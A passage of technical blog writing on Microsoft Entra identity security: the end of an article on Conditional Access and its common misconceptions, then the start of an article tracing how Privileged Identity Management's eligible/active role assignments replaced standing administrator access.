| order by TimeGenerated desc

The expected count for a well-tuned tenant is small. Spikes warrant a P2 investigation.

Break-glass

Two emergency-access accounts. FIDO2-bound. Excluded from every CA policy. Stored as separate hardware tokens in separate safes. Every sign-in is wired to a P1 alert. Per Section 9.4 and Microsoft Learn's emergency-access guidance, this is the acknowledged operational compromise to the break-glass paradox [@ms-emergency-access].

A non-personal Entra ID administrator account excluded from Conditional Access and from MFA enforcement, used only when the primary identity infrastructure has failed. Best practice: at least two such accounts, with hardware FIDO2 keys stored separately, monitored by an unconditional alert on any sign-in.

The article has answered "who decided?" five times over: by signal, by policy, by token, by session, by operational pattern. One section remains: the misconceptions that keep recurring.

11. Misconceptions that recur

Every time these questions come up in practice, the same wrong answers come back. The corrections are worth memorising.

Only if you have Entra ID P1 or higher and have configured CA policies. Free SKU tenants run Security Defaults, which is a coarse tenant-wide on/off switch, not CA [@ms-security-defaults]. CA is unlocked at P1 [@ms-ca-overview]; risk-based conditions are unlocked at P2 [@ms-id-protection-overview]. The "every tenant runs on CA" framing you sometimes see in marketing material is incorrect. No. CA is a cloud control plane. Kerberos and NTLM against on-prem domain controllers do not consult Entra at all [@ms-ca-overview]. If your threat model includes on-prem lateral movement, layer in Defender for Identity and the standard on-prem hardening playbook. No. CAE is event-driven push from the policy plane to CAE-aware resource APIs. The Microsoft Learn CAE document gives the latency ceiling precisely: "the goal for critical event evaluation is for response to be near real time, but latency of up to 15 minutes might be observed because of event propagation time; however, IP locations policy enforcement is instant" [@ms-cae-concept]. There is no 30-second poll. The token can live up to 28 hours because the revocation is event-driven. No. Clients advertise CAE-readiness via the `cp1` client capability in token requests, specifically by adding `cp1` to the `xms_cc` claim mechanism (or by calling `WithClientCapabilities(new[] { "cp1" })` in MSAL) [@ms-claims-challenge][@ms-app-resilience-cae]. The Microsoft Learn claims-challenge page is explicit: "The only currently known value is `cp1`" [@ms-claims-challenge]. The CAE-aware token is recognisable by its long lifetime (up to 28 hours) and by the resource API's willingness to issue an `insufficient_claims` challenge, not by a Boolean claim. No. Third-party MDM compliance partners can write the device compliance state into Entra via Intune's compliance-partner API [@ms-intune-compliance-partners]. The CA grant reads `isCompliant` on the device object; it does not care which MDM wrote that value. Microsoft's preferred deployment is Intune, but the integration point is open by design. In 2023. The public preview of CA filters for workload identities opened on 26 October 2022 [@vansurksum-2022-workload-ca]; the Microsoft Entra Workload Identities standalone product reached GA in late November 2022, and the Conditional Access feature itself reached general availability later in 2023 [@ms-workload-identity-ca]. Any article asserting a 2025 GA date for workload-identity CA is incorrect. No. Every sign-in produces a Sign-in log entry; ID Protection emits a `riskDetection` only when at least one detector fires for that sign-in [@ms-graph-riskdetection]. Most sign-ins produce no `riskDetection`. Detection engineers querying for risk should join the Sign-in log with the riskDetections log and treat unjoined rows as "no risk flagged at the moment." No Microsoft primary source publicly describes the production model architecture or names a per-sign-in feature-vector size. What is published is the detection taxonomy (about two dozen named `riskEventType` values [@ms-id-protection-risks][@ms-graph-riskdetection]), the timing split (real-time / near-real-time / offline [@ms-risk-detection-types]), and the three-tier risk output. The "transformer with 80+ signals" framing is folk knowledge with no Microsoft primary source behind it. The article reframes it as "ML-based with detailed architecture publicly undisclosed." Not on its own. A standard MFA grant does not defeat a kit like Evilginx, which proxies both the password and the MFA challenge in real time. The defence is to require the *phishing-resistant Authentication Strength* in CA: FIDO2 with hardware attestation, Windows Hello for Business, or multifactor certificate-based authentication [@ms-auth-strengths]. The cryptographic origin-binding in WebAuthn-class credentials defeats AitM by construction. But the defence only works *when the grant is applied*. A CA policy that demands phishing-resistant for admin roles but not for users will block AitM against admins and not against users.

12. Two planes, one boundary

Replay Alice's Tuesday.

Identity Protection's signal plane scored her 09:02 sign-in. The score was below the medium-risk threshold. Conditional Access's policy plane evaluated four matching policies. Two demanded MFA; her cached refresh token already satisfied that grant from yesterday. One demanded a compliant device; Intune had marked her laptop compliant overnight. None demanded the block grant. The token issuer issued a CAE-aware bearer token with a 28-hour lifetime. Exchange Online accepted the token. Outlook's data path opened. Bytes returned to Alice.

If, twelve minutes later, an attacker tries to sign in with Alice's credentials from an anonymizing proxy, ID Protection will fire a detection. The detection will lift her user risk to high. CAE will deliver the high-user-risk event to Exchange. Exchange will issue a claims challenge on the next call from Alice's Outlook. Outlook will replay the challenge to Entra. Entra will re-run CA, see the elevated risk, demand step-up MFA, and either issue a fresh token (after Alice satisfies the step-up) or refuse.

The modern identity boundary is not a wall. It is a conversation between planes.

Key idea: The boundary is a conversation between planes, not a wall.

The open frontier is real. Agent identities want a richer grant taxonomy than the human one provides. Cross-vendor CAEP wants production receivers outside Microsoft. Workload-identity policy wants grants that go beyond block. The break-glass paradox wants an answer that does not depend on operational discipline. None of these problems will resolve in 2026. They are the next frontier.

What the reader should now be able to do: trace a sign-in through the signal, policy, token, and session planes; read a conditionalAccessPolicy JSON and predict the evaluation outcome; identify which class of attack each grant defends against; and name, by reference to specific Microsoft Learn pages, what CA does not defend against. The promise from Section 1 is delivered.

Today, 100 percent of consumer Microsoft accounts older than 60 days have multifactor authentication. -- Alex Weinert, Microsoft Identity, November 2023 [@weinert-2023-managed-policies]

Who decided this token is good? The boundary itself decided, by composing the work of every plane named above.

Privileged Identity Management: How a Two-State Role Assignment Retired Standing Admin

noreply@paragmali.com (Parag Mali) — Mon, 25 May 2026 00:00:00 GMT

**Standing Global Administrator was never a design choice. It was the only posture a single-state role-assignment object could produce.** Microsoft Entra PIM added one field to that object -- `type: eligible | active` -- and everything downstream (activation policies, audit logs, access reviews, six PIM Alerts, PIM-for-Groups, PIM-for-Azure-Resources, GDAP, Lighthouse, PIM with Conditional Access) is a structural consequence of that single change. The pattern works for human users. The open boundary in 2026 is application identities -- service principals, managed identities, OAuth consent grants -- which route around PIM entirely via the Azure Instance Metadata Service endpoint at `169.254.169.254`, the bypass class Andy Robbins documented in June 2022 and MITRE ATT&CK now maps to T1078.004.

1. The Tenant with Zero Standing Global Administrators

At 14:03:01 on a Tuesday in 2026, alice@contoso.com became Global Administrator of her company's Microsoft Entra tenant. At 15:03:01 the same day, she stopped being one. In between, she restored a deleted user, exported an audit log, and produced a single PIM record: Justification reads "incident MSRC-2026-PIM-12345, ticket SNOW-INC-987654"; Approver reads "bob@contoso.com (decided 14:02:17)"; ActivatedAt and ExpiredAt differ by exactly PT1H. The SOC 2 auditor signed it off without follow-up questions.

The 2015-vintage version of the same tenant looked nothing like this. Twelve standing Global Administrators. No multifactor challenge at privilege use. No approval workflow. No justification field. No audit trail beyond ordinary sign-in logs. A single phish of any one of those twelve identities was tenant takeover. The math required no sophistication: the attack surface for "Global Administrator of contoso.com" equalled the union of twelve personal attack surfaces, indefinitely.

What changed between the two tenants is not a habit, not a policy, not a culture shift. It is a single field on a single object inside Microsoft Entra ID.

Key idea: Standing admin was never a deliberate design decision. It was the only deployment posture a single-state role-assignment object could produce. Once Microsoft made the role-assignment object two-state, JIT admin became expressible -- and standing admin became visibly the anti-pattern it had been since 1975.

To explain that field, and to explain why it took fifty-one years to ship, we start where the principle did: a 1975 paper by two MIT researchers who knew what privilege should look like but had no mechanism to enforce it.

2. The Default Wasn't a Decision

Who designed the standing Domain Admin pattern? No one. It was the only assignment category Active Directory shipped with.

A forty-year deployment posture with no author. That is the first thing to internalize. Standing admin is what happens when a data model offers exactly one assignment category and operators still have real work to do. Every later "best practice" was an attempt to talk operators out of the one tool they had been given.

1975: The principle without a mechanism

In September 1975, Jerome Saltzer and Michael Schroeder published The Protection of Information in Computer Systems in the Proceedings of the IEEE [@saltzer-schroeder-1975]. The paper is a survey of secure-systems design, organized around eight named design principles that the authors crystallized from work on Multics and other early protected operating systems. Both authors were affiliated with MIT's Project MAC and the Department of Electrical Engineering and Computer Science [@saltzer-mit-meta].

The sixth principle, named Least Privilege, is the one every later JIT-admin product cites:

Every program and every user of the system should operate using the least set of privileges necessary to complete the job. -- Saltzer & Schroeder, *The Protection of Information in Computer Systems*, 1975, Design Principle (f), the sixth of eight [@saltzer-schroeder-1975] Design Principle (f), the sixth of eight, in the 1975 Saltzer and Schroeder paper. Every program and every user of the system should operate using the least set of privileges necessary to complete the job. The principle is correct, parsimonious, and -- for four decades after publication -- mechanically unenforceable for the temporal case. Static enforcement (ACLs, capability lists, ring boundaries) was tractable in 1975; bounding the time interval during which a privilege is held was not.

Read the principle carefully. It does not say "every user should hold the least set of privileges." It says they should operate using the least set of privileges. The two formulations look identical until you ask what a person does between bursts of administrative work. A user who holds the privilege "permanently active" is operating using it permanently, whether they touch the system or not. The 1975 paper points at the temporal dimension and walks past it. The worked examples cover static mechanisms -- protection rings, access control lists, capability tickets -- not time-bounded ones. The principle was correct. The mechanism did not yet exist.

For the next forty years, every approximation tried to compensate. UNIX sudo (1980) bound elevation to a single command. Kerberos delegation (1988) bound impersonation to a ticket. Windows DACLs and Active Directory groups (1993 and 2000) bound access to a static membership list. None made temporal least privilege a first-class data-model property. None let an operator say "I am eligible to be Domain Admin, but I am not Domain Admin right now."

Microsoft's 2014 *Mitigating Pass-the-Hash v2* whitepaper introduced a three-tier administrative model. Tier 0 is identity-system-critical: domain controllers, ADFS, PKI, anything whose compromise gives forest-wide privilege. Tier 1 is enterprise servers and business-critical applications. Tier 2 is user workstations and end users. The enforcement rule is one sentence: an administrator credential for Tier N must never be exposed to a system at a higher (numerically larger) tier. Microsoft has progressively retired this framing in favour of the Enterprise Access Model, which we revisit in section 6.

2000-2013: Group membership as a boolean

When Active Directory shipped with Windows 2000 on February 17, 2000 [@ms-news-windows-2000-launch], privileged access was structurally a boolean property of the principal. A user was either a member of BUILTIN\Administrators, Domain Admins, Enterprise Admins, or Schema Admins, or they were not. The membership lived in the directory as the member attribute on the group object (and the memberOf back-link on the user). It was set when assignment was made, unset when an administrator manually revoked it. No third state. No attribute could hold one.

A privileged identity whose role assignment is active and permanent. The role's permissions are granted continuously, regardless of whether the principal is currently exercising the privilege. Standing admin is the default state of any pre-PIM tenant and the deployed-reality state of most AD-only environments through 2026.

Kerberos's Privilege Attribute Certificate -- the PAC -- carried the user's group SIDs forward into every Kerberos ticket the user obtained.The Privilege Attribute Certificate is the data structure inside a Kerberos ticket that lists the user's group SIDs. Pre-2016 Active Directory had no per-membership TTL metadata in the PAC. There was nowhere in the existing schema to put an expiry timestamp, which is why on-prem JIT membership later required a separate forest rather than an in-directory mechanism. A ticket's lifetime was bounded; the SID set inside it was not. There was no per-membership TTL anywhere in the system. If you wanted "Alice is Domain Admin between 14:00 and 15:00 today and not otherwise," the directory had no machinery to express it. Alice was Domain Admin permanently, or not at all.

Twenty years of deployment matched the data model exactly. A typical 2010-vintage enterprise ran ten to thirty standing Domain Administrators across business units, because manually adding and removing membership for each task was untenable at human scale. The data model did not punish standing membership; the operator chose the only category the directory offered.

December 2012: Microsoft names the failure mode

In December 2012, Patrick Jungles, Mark Simos, Aaron Margosis, Roger Grimes, Laura Robinson and the Microsoft Trustworthy Computing team published Mitigating Pass-the-Hash and Other Credential Theft, Version 1 [@pth-download-center], [@berkouwer-pth-2013]. It is the first formal Microsoft acknowledgment that credential-theft propagation through Active Directory was not a software defect to be patched but a structural property of standing admin membership.

The argument is direct. If twelve Domain Admins exist, the attack surface of "Domain Admin of contoso.local" is the union of those twelve people's personal attack surfaces. Any one gets phished, or gets hash-extracted from a Tier-1 server they accidentally signed into, and the attacker has Domain Admin permanently. The MIM PAM documentation later restated the failure in one sentence: "Today, it's too easy for attackers to obtain Domain Admins account credentials, and it's too hard to discover these attacks after the fact" [@ms-learn-mim-pam-overview].

2014: The tier model arrives, the mechanism does not

The 2014 update -- Mitigating Pass-the-Hash, Version 2 [@pth-download-center] -- generalized the threat model and introduced the Tier-0 / Tier-1 / Tier-2 framing as a structural mitigation. v2 said two things clearly that v1 had only implied. First, standing membership in Tier-0 groups was the root cause, not a downstream defect. Second, the mitigation pattern -- isolate tiers, reduce the standing count, use dedicated Privileged Access Workstations -- was guidance, not a mechanism. Microsoft Trustworthy Computing did not yet have a product that could mechanically time-bound group membership in Active Directory.

v2 named the problem, drew the threat model, and recommended the structural fix. What it could not do was ship a mechanism. The mechanism would come, but on the wrong side of the cloud boundary.

3. The On-Prem Detour: MIM 2016 PAM, Bastion Forests, and Shadow Principals

Microsoft's first mechanical JIT-admin product was not in the cloud. It was on-premises, and it required a separate Active Directory forest.

Stop and re-read that. To bound the duration of a group membership in pre-2016 Active Directory, Microsoft had to build a different directory and inject SIDs from one into the other across a trust. The reason was the data model. The production forest's member attribute had no TTL field. Adding one meant changing the AD schema. Changing the schema meant a Windows Server release. So while the schema change was in flight, Microsoft shipped the on-prem JIT-admin product on a different architecture: ask the operator to stand up a second forest whose only job was to issue time-bounded SIDs into the first.

August 6, 2015: MIM 2016 ships PAM

On August 6, 2015, Microsoft Identity Manager 2016 reached general availability and shipped a new capability named Privileged Access Management [@ms-learn-mim-pam-overview]. The architecture is the interesting part. MIM PAM uses three primitives that, together, give Active Directory a mechanically time-bounded group membership for the first time:

A bastion forest -- an entirely separate Active Directory forest, sometimes called the "red" forest or "admin" forest, where privileged accounts live.
A one-way PAM trust from the production forest to the bastion forest, configured for selective authentication.
Shadow principal objects in the bastion forest, each carrying a SID that names a real privileged group in the production forest.

A separate Active Directory forest dedicated to housing privileged accounts. In MIM 2016 PAM the bastion forest holds shadow-principal objects whose SIDs point at production-forest privileged groups; a one-way PAM trust lets the production forest accept those SIDs in incoming Kerberos tickets for a bounded duration. An Active Directory object (schema class `msDS-ShadowPrincipal`, introduced in Windows Server 2016) that represents a foreign user, group, or computer in the bastion forest and carries an `msDS-ShadowPrincipalSid` attribute populated with the SID of a production-forest privileged group. Membership in a shadow principal results in that production-forest SID being added to the requesting user's Kerberos PAC for the membership TTL.

The activation flow is direct. A user in the bastion forest requests privilege through the MIM Portal. An approver decides. MIM writes a TTL-bounded membership in the appropriate shadow principal, with the TTL enforced by the Windows Server 2016 temporal-group-membership feature [@teal-esae3]. The bastion KDC injects the production-forest SID into the user's Kerberos PAC. The production forest accepts that SID across the PAM trust. After the TTL expires, subsequent ticket renewals exclude the privileged SID, and the user no longer holds the privilege.

flowchart LR subgraph BASTION["CORP-PRIV bastion forest"] A["Privileged user account"] SP["Shadow principal (msDS-ShadowPrincipal) carries production SID, TTL"] BKDC["Bastion KDC"] A -->|"Time-bound membership"| SP SP --> BKDC end subgraph PROD["CORP production forest"] DA["Domain Admins"] PKDC["Production KDC"] end BKDC -->|"Kerberos ticket carries injected SID via PAM trust"| PKDC PKDC -->|"SID in PAC grants membership for TTL only"| DA

October 15, 2016: Windows Server 2016 makes the mechanism real

For the first fourteen months of MIM 2016's life, the full feature did not work. The temporal-group-membership and shadow-principal schema classes that MIM PAM depends on are AD primitives that arrived only with Windows Server 2016, which reached general availability on October 15, 2016 [@ms-learn-lifecycle-ws2016]. Microsoft Learn states the requirement directly: "With Windows Server 2016, PAM features of time-limited group memberships and shadow principal groups are built into Windows Server Active Directory" [@ms-learn-raise-bastion], and "All domain controllers in the bastion environment for the PRIV forest must be Windows Server 2016 or later" [@ms-learn-raise-bastion].The PAM trust is technically a forest trust with selective authentication enabled. The selective authentication flag is what prevents the bastion forest's privileged identities from being usable for anything other than the explicit shadow-principal SID injection -- without it, the bastion forest would itself become a sprawling privileged-access surface.

This is the moment AD itself gains a temporal least-privilege primitive, forty-one years after Saltzer and Schroeder published the principle. The mechanism is real, but the operational profile is brutal.

Three reasons it did not generalize

MIM PAM solved exactly one problem and could not be extended to the next. Three structural constraints kept it confined to a niche.

First, it was on-premises only. A bastion forest is an Active Directory artifact. Microsoft Entra ID, Office 365, and Azure RBAC role assignments live in a different identity system, with no concept of a forest, no PAM trust target, and no place to plug a shadow-principal object. MIM PAM had no cloud story, and by 2015 the cloud was already where most new Microsoft privileged-access surfaces were being deployed.

Second, the operational complexity filtered out everyone except the most security-mature shops. A bastion forest is a separate Active Directory forest, with its own domain controllers, replication, backup, disaster recovery, and PKI implications. The deployment also requires MIM Service, MIM Portal, MIM Web Service, and SQL Server. Auditing the PAM trust correctly is itself non-trivial work. Microsoft Learn now positions MIM PAM as appropriate only for isolated, non-Internet-connected deployments [@ms-learn-mim-pam-overview]; the verbatim positioning and the MIM 2016 lifecycle details are in the Callout below.

Note: Microsoft Learn states MIM PAM is "not recommended for new deployments in Internet-connected environments" and positions it for "isolated AD environments where Internet access is not available" [@ms-learn-mim-pam-overview]. MIM 2016 itself remains in extended support through January 9, 2029 [@ms-learn-mim-2016], and Microsoft has shipped SP3 compatibility updates for SharePoint Subscription Edition, Exchange SE, and SQL Server 2022 -- but the cloud-first Entra PIM path is the canonical answer for new tenants.

Third, the forest-functional-level dependency delayed real deployment by more than a year. Shadow principals were not usable until Windows Server 2016 reached GA in October 2016. MIM 2016 had been generally available since August 2015. For its first fourteen months in market, the headline JIT-admin feature could not be configured at full fidelity. By the time Windows Server 2016 shipped, Microsoft was already operating its cloud PIM in production.

What the on-prem detour reveals about the cloud's shape

MIM PAM mechanically bounds membership in groups via shadow principals in a separate forest. The cloud has no concept of a forest. So the cloud-native mechanical bound must attach to the assignment object directly, not to the group object indirected through a separate forest. The cloud needed a new assignment-category type, not a new forest topology.

The cloud does not have a forest. It has a role-assignment object. What if that object grew a second state?

4. The Breakthrough: A Two-State Role-Assignment Object

By August 2015, while MIM 2016 PAM was still in late preview for the on-premises case, the Microsoft Identity Division had already shipped something different for the cloud. They shipped a role-assignment object with one new field. That field changed everything that came after it.

The 2015 preview

Alex Simons's August 27, 2015 capability-update post on the CloudBlogs (now migrated to Microsoft Tech Community) is the first public articulation of what Azure AD PIM was building [@simons-2015-aug]. It introduced four surfaces: an eligible assignment category distinct from active, multifactor authentication required at activation, security alerts that watched for privileged-role anomalies, and what the post called Security Reviews -- the precursor to access reviews. The architecture under those four surfaces is the load-bearing part: a single new field on the role-assignment object.

On September 15, 2016, Azure AD Premium P2 reached general availability and carried the first generally-available cloud-native PIM, attributed to Joy Chik (then Corporate Vice President of the Identity Division) and the Identity engineering team [@techcommunity-p2-ga]. Eligible-versus-active was now a billable, supported, production-grade feature.

The one-function spine

Read this carefully. It is the article's central claim.

Key idea: Standing admin was the default not because anyone thought it was secure, but because the role-assignment object had only one state. PIM's contribution is to add a second state -- eligible -- and to make the transition from eligible to active a gated, audited, time-bounded operation that is by definition mediated by PIM.

The principle was Saltzer and Schroeder, 1975. The recognition that standing admin was the failure mode was Mitigating Pass-the-Hash, 2012 and 2014. The on-premises mechanism was MIM 2016 PAM. The cloud answer is a different shape entirely: not a new directory and a SID-injection trust, but a single field on the assignment object itself.

Microsoft Learn documents the resulting terminology in the PIM overview. A principal -- user, group, service principal, or managed identity -- can be eligible or active for a role, and either assignment can be permanent or time-bound [@ms-learn-pim-configure]. The same page elevates a forty-year-old phrase into a product term: "principle of least privilege access -- A recommended security practice in which every user is provided with only the minimum privileges needed to accomplish the tasks they're authorized to perform" [@ms-learn-pim-configure]. The 1975 sentence is now a glossary entry inside a 2026 product, and the product has a mechanism that makes the sentence enforceable.

The formal tuple

Concretely, a PIM-managed role assignment is a 5-tuple. Let $A = (p, r, s, t, d)$ where $p$ is the principal, $r$ is the role, $s$ is the scope, $t \in {\text{eligible}, \text{active}}$, and $d \in {\text{permanent}, \text{time-bound}[s_0, e_0]}$. The activation transition is

$$\text{activate}: A_{t=\text{eligible}} \longrightarrow A_{t=\text{active},\ d=\text{time-bound}[\text{now},\ \text{now}+\Delta]}$$

subject to the per-role activation policy. The interesting part is what the tuple makes expressible:

RoleAssignment = {
    principal:  user | group | service principal | managed identity,
    role:       Entra directory role | Azure RBAC role | group membership | group ownership,
    scope:      directory | management-group | subscription | resource-group | resource | group,
    type:       eligible | active,
    duration:   permanent | time-bound[start, end]
}

activate: eligible_assignment -> active_assignment   // PIM-mediated, gated, audited

A PIM-managed role assignment that grants no privilege until the principal invokes `activate()`. The eligible assignment is the standing relationship between principal and role; the active assignment is the time-bounded materialization that follows when the activation policy is satisfied [@ms-learn-pim-configure]. A PIM-managed role assignment that grants the role's permissions for the duration of the assignment. Active assignments are either permanent (the legacy pre-PIM posture, or an explicit permanent-active PIM assignment) or time-bound (the result of an `activate()` call on an eligible assignment) [@ms-learn-pim-configure]. flowchart TD subgraph Permanent["Permanent duration"] PE["Permanent eligible -- standing eligibility, no privilege held"] PA["Permanent active -- legacy standing admin"] end subgraph TimeBound["Time-bound duration"] TE["Time-bound eligible -- standing eligibility with end date"] TA["Time-bound active -- JIT admin after activate()"] end PE -->|"activate()"| TA TE -->|"activate()"| TA TA -->|"expire or deactivate()"| PE PA -->|"legacy posture being retired"| PE

The grid has only four cells. Permanent active is the pre-PIM world, the standing-admin posture every later best practice has been trying to retire. Time-bound active is the JIT-admin state, materialized only at the moment of work and expired shortly after. The two eligible states -- permanent or time-bound -- are the standing relationships between a principal and a role that grant no privilege at rest. The expressive change is small. The deployment consequences are total.

PIM did not add eight features. It added one field, and everything else is downstream.

This is Aha #1. The reader who came in believing standing admin persisted for forty years because operators lacked discipline now sees it differently. Operator discipline was a fragile workaround for a missing data-model field. The 1975 principle was correct. The 2012-2014 PtH whitepapers were correct. The operators were not the problem. The role-assignment object had one state to be in, and the deployment matched the data model exactly. The fix was a structural change to the data model.

The next nine years of PIM history are about extending that two-state primitive: to Azure RBAC, to security groups, to partner tenants, to the conditional-access plane, and to a detection layer that flags people who try to skip activation entirely. We walk each extension in turn. First, the mechanism itself.

5. Anatomy of an Activation

We have seen what changed. Walk through what happens, end to end, when alice@contoso.com clicks "Activate" on her eligible Global Administrator assignment at 14:00:00 on a Tuesday.

The activation flow, step by step

Six things happen, in order, and each writes audit-log evidence:

The eligible assignment already exists. Alice has been a permanent-eligible Global Administrator since she was hired. The PIM directory object records principal alice@contoso.com, role Global Administrator, scope directory, type=eligible, duration=permanent. Today she holds zero of the role's permissions.
The activation request lands on PIM. Alice clicks Activate in the Entra admin centre, or fires the equivalent Microsoft Graph call. PIM pulls the activation policy for (role=Global Administrator, scope=directory) and prepares to evaluate the gates [@ms-learn-pim-change-default-settings].
The policy gates evaluate. This is the load-bearing part, and the place readers most often misread the docs. The gates are per-role configurable, not universal. Microsoft Learn documents five gates the tenant can independently switch on or off [@ms-learn-pim-change-default-settings]:
- Multifactor authentication at activation if requires_mfa is set.
- Approval routing to named approvers or an approver group if requires_approval is set.
- Justification text capture if requires_justification is set.
- Ticket number capture, optionally tagged with a ticketing-system identifier, if requires_ticket is set.
- Activation duration validation against the per-role configurable maximum -- one to twenty-four hours, with one hour the default for the highest-privileged Entra roles such as Global Administrator and Privileged Role Administrator [@ms-learn-pim-change-default-settings].
PIM materializes the active assignment. Microsoft Learn states the latency directly: "Microsoft Entra PIM creates active assignment (assigns user to a role) within seconds" [@ms-learn-pim-activate]. A new token Alice obtains after this moment will carry the activated role's claims.
The PIM audit log records the entire transaction. A new entry captures the request, the approver's decision and decision time, the justification text, the ticket reference, the activation start, and the planned expiry. The audit log is retained for thirty days by default and can be routed to Azure Monitor for longer retention [@ms-learn-pim-audit-log].
Auto-deactivation fires at the duration boundary. At 15:00:00 -- one hour after activation -- PIM deactivates the assignment within seconds [@ms-learn-pim-activate]. Alice can also call deactivate() explicitly to return early.

sequenceDiagram autonumber participant User as alice participant PIM participant MFA participant Approver as bob participant Graph as Microsoft Graph participant Audit as PIM audit log User->>PIM: Activate Global Administrator PIM->>MFA: Require MFA challenge MFA-->>PIM: MFA passed PIM->>Approver: Route approval request Approver-->>PIM: Approve with justification context PIM->>Graph: Materialize active assignment within seconds PIM->>Audit: Write request, decision, materialization records Note over PIM,Audit: Token issued with activated role claims Note over PIM,Graph: One-hour TTL begins PIM->>Graph: Auto-deactivate at expiry within seconds PIM->>Audit: Write deactivation record

Activation policies are configured, not assumed

Two of the most common misunderstandings the documentation receives are about this configurability. First, MFA at activation is not universally required by PIM. The role's activation policy must be set to require it. Second, the activation maximum is configurable per role per scope inside a one-to-twenty-four-hour range, with the default for Global Administrator and Privileged Role Administrator at one hour [@ms-learn-pim-change-default-settings]. A "PIM tenant" where one role requires MFA and approval and another role requires only justification text is a perfectly valid configuration; both roles are PIM-gated, but their gate sets differ.

A per-role-per-scope configuration of which gates an activation must satisfy: MFA at activation, approval, justification, ticket number, and the activation maximum duration. PIM evaluates the policy at activation time. The gates are independent flags; any combination can be required [@ms-learn-pim-change-default-settings].

Note: PIM's activation maximum duration is configurable per role per scope in the one-to-twenty-four-hour range. The default value for the highest-privileged Entra directory roles -- Global Administrator and Privileged Role Administrator -- is one hour [@ms-learn-pim-change-default-settings]. Other roles default to higher values. Tighten the duration where you can; the activation cost is small, the standing-active surface saving is large.

Authentication context: gating activation, not sign-in

Conditional Access has gated sign-in since 2014. Until 2023, it had no way to gate the activation event itself. The integration between PIM and Conditional Access changes that by attaching an authentication context label to the activation, which Conditional Access can target the same way it targets any other authentication. Microsoft Learn includes the activation policy option "On activation, require Microsoft Entra Conditional Access authentication context" [@ms-learn-pim-change-default-settings].

A label that PIM attaches to the activation event so that Conditional Access policies can target the activation itself, not just the sign-in. Policies such as "activation of Global Administrator requires a compliant device and an MFA challenge issued within the last five minutes" become expressible without bolting on a third-party stack [@ms-learn-pim-change-default-settings].

The activation gate, as code

To make the gate-composition idea concrete, here is the activation policy as a small JavaScript function. Edit the policy or the request and re-run it.

{` function activate(request, policy) { // policy gates are independent; any combination can be required if (policy.requires_mfa && !request.mfa_passed) { return { ok: false, reason: 'MFA challenge failed or absent' }; } if (policy.requires_approval && !request.approval_decision) { return { ok: false, reason: 'Approval pending' }; } if (policy.requires_justification && !request.justification) { return { ok: false, reason: 'Justification text missing' }; } if (policy.requires_ticket && !request.ticket_number) { return { ok: false, reason: 'Ticket number missing' }; } if (request.duration_hours > policy.max_duration_hours) { return { ok: false, reason: 'Requested duration exceeds policy maximum' }; } // activation succeeds: materialize a time-bound active assignment const expires_at = new Date(Date.now() + request.duration_hours * 3600 * 1000); return { ok: true, active_assignment: { principal: request.principal, role: request.role, scope: request.scope, type: 'active', duration: { kind: 'time-bound', start: new Date(), end: expires_at } } }; }

const policy = { requires_mfa: true, requires_approval: true, requires_justification: true, requires_ticket: true, max_duration_hours: 1 }; const request = { principal: 'alice@contoso.com', role: 'Global Administrator', scope: 'directory', mfa_passed: true, approval_decision: 'approve', justification: 'MSRC-2026-PIM-12345', ticket_number: 'SNOW-INC-987654', duration_hours: 1 }; console.log(activate(request, policy)); `}

The function is mechanical and short for a reason. Every PIM gate is independently expressible, the policy is a record, the request is a record, and the active-assignment output is itself a record the system can audit. The complexity of PIM, such as it is, lives in the surrounding infrastructure -- the directory, the audit log, Conditional Access, the alert engine -- not in the gate itself.

The Azure-resource five-minute floor

One operational detail belongs here.Azure resource role assignments under PIM-for-Azure-Resources carry an additional latency floor: an Azure resource role assignment cannot be made for a duration of less than five minutes and cannot be removed within five minutes of being created [@ms-learn-pim-resource-roles]. This is the rare place where the cloud control plane exposes a hard minimum-time bound in its assignment-state machine, and it shapes the lower limit of any tightening strategy on Azure RBAC scopes.

Activation is the per-event control. But what about the standing posture across the tenant -- the eligibility surface, the drift you did not notice, the assignment configuration in places PIM does not reach by default? For that, you need access reviews, and you need to push the eligible/active primitive beyond the original twenty-eight built-in directory roles.

6. Beyond Directory Roles: Extending Eligible and Active Across Four Boundaries

PIM at GA in September 2016 covered roughly twenty-eight built-in Entra directory roles. Everything else -- Azure RBAC, security groups, partner-tenant delegation, the Conditional Access activation event -- was still single-state and permanent-active. The next nine years of PIM history are the story of closing those four boundaries, one at a time.

flowchart TD Core["Two-state assignment object, 2016"] Core --> Azure["PIM for Azure Resources, 2017-2019, RBAC at four scopes"] Core --> Groups["PIM for Groups, GA October 2023, membership and ownership"] Core --> Partner["GDAP May 2022 plus Azure Lighthouse eligible authorizations"] Core --> CA["PIM with Conditional Access authentication context, GA October 2023"]

Boundary 1: PIM for Azure Resources

Between 2017 and 2019, Microsoft extended the eligible-versus-active model from Entra directory roles to Azure RBAC. The extension covers four scopes -- management group, subscription, resource group, and individual resource -- and supports both built-in roles (Owner, Contributor, User Access Administrator, and the security roles) and custom roles [@ms-learn-pim-resource-roles].

The non-obvious operational property of PIM-for-Azure-Resources is that role settings do not inherit down the RBAC hierarchy. A policy you tighten on Owner at the management-group scope does not automatically flow down to Owner on subscriptions, resource groups, or resources beneath it. Each (role, scope) pair is its own policy slot, and each must be configured.

Note: Configure activation policies per role per scope explicitly across the management-group, subscription, resource-group, and resource hierarchy. A tightening at the management-group scope does not flow to subscriptions beneath it. The most common operational defect in mature PIM tenants is the unconfigured policy at a downstream scope, leaving a wide-open activation surface under what looked like a hardened parent.

Boundary 2: PIM for Groups

The PIM-for-Groups timeline is three distinct events. In August 2020, Microsoft previewed the feature under its original name, "Privileged Access Groups," and limited the preview scope to role-assignable security groups [@simons-2020-aug]. In January 2023, Microsoft renamed the feature to "Privileged Identity Management for Groups" in the Entra admin centre; the underlying eligible/active model was unchanged [@ms-learn-pim-for-groups]. In October 2023, more than three years after the preview, PIM for Groups reached general availability with a broader scope -- role-assignable security groups (carried forward), non-role-assignable security groups (newly supported), and Microsoft 365 groups (newly supported), with JIT for both membership and ownership [@ms-techcommunity-pim-groups-ca-ga-2023], [@ms-learn-pim-for-groups], [@ms-learn-pim-groups-role-settings].The three events span more than three years and should not be conflated. August 2020: preview of "Privileged Access Groups," role-assignable security groups only [@simons-2020-aug]. January 2023: rename to "PIM for Groups"; same scope and model [@ms-learn-pim-for-groups]. October 2023: general availability with the broader scope (non-role-assignable security groups plus M365 groups), and JIT for both membership and ownership [@ms-techcommunity-pim-groups-ca-ga-2023]. Two structural exclusions persist throughout: dynamic-membership groups and groups synchronized from on-premises Active Directory [@ms-learn-pim-for-groups]. The scope is broad: any Entra security group and any Microsoft 365 group, except dynamic-membership groups and 